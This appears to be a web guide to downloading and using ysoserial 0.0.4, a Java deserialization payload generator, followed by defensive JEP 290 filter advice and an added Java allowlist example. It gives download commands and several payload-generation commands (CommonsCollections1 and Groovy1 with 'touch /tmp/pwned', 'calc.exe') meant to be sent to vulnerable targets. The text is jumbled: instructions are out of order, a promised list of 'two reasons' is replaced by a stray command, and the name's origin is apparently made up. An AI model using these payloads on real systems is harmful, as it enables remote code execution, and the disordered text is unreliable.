Once you have the file, usage is standard across most versions. Ensure you have Java installed (preferably Java 7 or 8 for legacy compatibility with this specific JAR version).
Basic Syntax:
java -jar ysoserial-0.0.4-all.jar [gadget] [command]
Example: If you are testing a Linux machine for the classic Apache Commons Collections vulnerability (Collections 3.2.1), you might generate a payload that opens a calculator (a standard proof-of-concept) or runs a shell command.
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "touch /tmp/pwned"
This command outputs a stream of raw bytes. You would typically pipe this output into a file or a network request sent to the vulnerable target application.
To verify the download, compute its SHA-256 hash. On Linux or macOS:
sha256sum ysoserial-0.0.4-all.jar
On Windows (PowerShell):
Get-FileHash ysoserial-0.0.4-all.jar -Algorithm SHA256
If the output matches the official hash, the download is intact and unmodified (a matching hash confirms integrity, not that running the tool is risk-free).
Once executed via java -jar ysoserial-0.0.4-all.jar, the tool generates a serialized payload. Example:
java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "calc.exe" > payload.ser
Defending against v0.0.4 payloads:
Example JVM parameter (a JEP 290 deserialization filter, available since Java 9 and backported to Java 8u121; note that ".**" is required to cover subpackages, which is where the gadget classes actually live, whereas ".*" matches only classes directly in the named package):
-Djdk.serialFilter=!org.apache.commons.**;!org.codehaus.groovy.**
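A reject list like the one above still lets every other class through. The example below, added here and not part of ysoserial or the page's original text, applies the same JEP 290 filter mechanism programmatically as an allowlist on a single ObjectInputStream, with depth and array limits; it requires Java 9+ (java.io.ObjectInputFilter), and the Greeting and NotAllowed types are hypothetical stand-ins for an expected application class and an unexpected one.

```java
import java.io.*;

// Added example, not ysoserial code: allowlist deserialization filter (JEP 290).
// Any class not explicitly allowed is rejected before its readObject() or any
// gadget logic can run; depth/array limits cut off recursion and memory bombs.
public class FilteredDeserialization {

    // Hypothetical application type that we DO expect on the wire.
    public static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Greeting(String text) { this.text = text; }
    }

    // Hypothetical type that is NOT allowlisted (stands in for a gadget class).
    public static final class NotAllowed implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Allow java.base classes and our own type, reject everything else ("!*").
    // ".**" would match subpackages; an exact class name matches only itself.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=10;maxarray=10000;"
          + "java.base/*;"
          + "FilteredDeserialization$Greeting;"
          + "!*");

    static Object readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(FILTER); // rejected classes throw InvalidClassException
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        Greeting ok = (Greeting) readFiltered(serialize(new Greeting("hello")));
        System.out.println("accepted: " + ok.text);
        try {
            readFiltered(serialize(new NotAllowed()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage()); // filter status: REJECTED
        }
    }
}
```

The same pattern string can be passed process-wide as -Djdk.serialFilter=... so that every ObjectInputStream in the JVM is covered without code changes.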
https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar
Instructions:
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar
Or with curl:
curl -LO https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar
On Windows, you can also download directly via browser by pasting the URL.
While the project is currently on versions 0.0.6+ (and active forks go even further), version 0.0.4 is often sought after for two reasons:
java -jar ysoserial-0.0.4-all.jar Groovy1 'touch /tmp/pwned' > payload.ser
ysoserial is a proof-of-concept tool that generates Java deserialization payloads. It exploits the fact that many Java libraries and applications deserialize untrusted data without proper validation. The tool chains together various "gadget chains" (existing classes and methods in common Java libraries such as Apache Commons Collections, Spring, Groovy, etc.) to execute arbitrary commands or code.
The name "ysoserial" is a play on "JSON serialization," but its real power lies in binary Java serialization.